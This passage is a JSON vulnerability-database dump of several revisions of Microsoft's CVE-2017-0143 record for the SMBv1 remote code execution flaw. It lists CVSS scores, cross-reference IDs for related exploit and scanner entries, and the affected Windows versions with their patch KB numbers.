"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-06T10:43:29", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": 
["KLA10977", "KLA11902", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-06T10:43:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-06T10:43:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012606", "KB4012598", "KB4012215", "KB4012217", "KB3213986", "KB3205401", "KB3177186", "KB3205409", "KB4012213", "KBMS16-110, 3187754", "KB4012216", "KB4013198", "KB4012212", "KB3210720", "KB4012214", "KB3212646", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": 
""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows 
Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", 
"kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", 
"msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": 
"KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T10:43:29", "differentElements": ["msAffectedSoftware"], "edition": 15}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-06T12:49:42", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-06T12:49:42", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-06T12:49:42", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3212646", "KB4012217", "KB3177186", "KB3205409", "KB3210720", "KB4012213", "KB3210721", "KB3205401", "KB4012212", "KB3213986", "KB4012214", "KB4012598", "KB4012216", "KB4013198", "KB4013429", "KB4012215", "KB4012606", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 
R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 
2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T12:49:42", "differentElements": ["msAffectedSoftware"], "edition": 16}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-06T16:54:11", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", 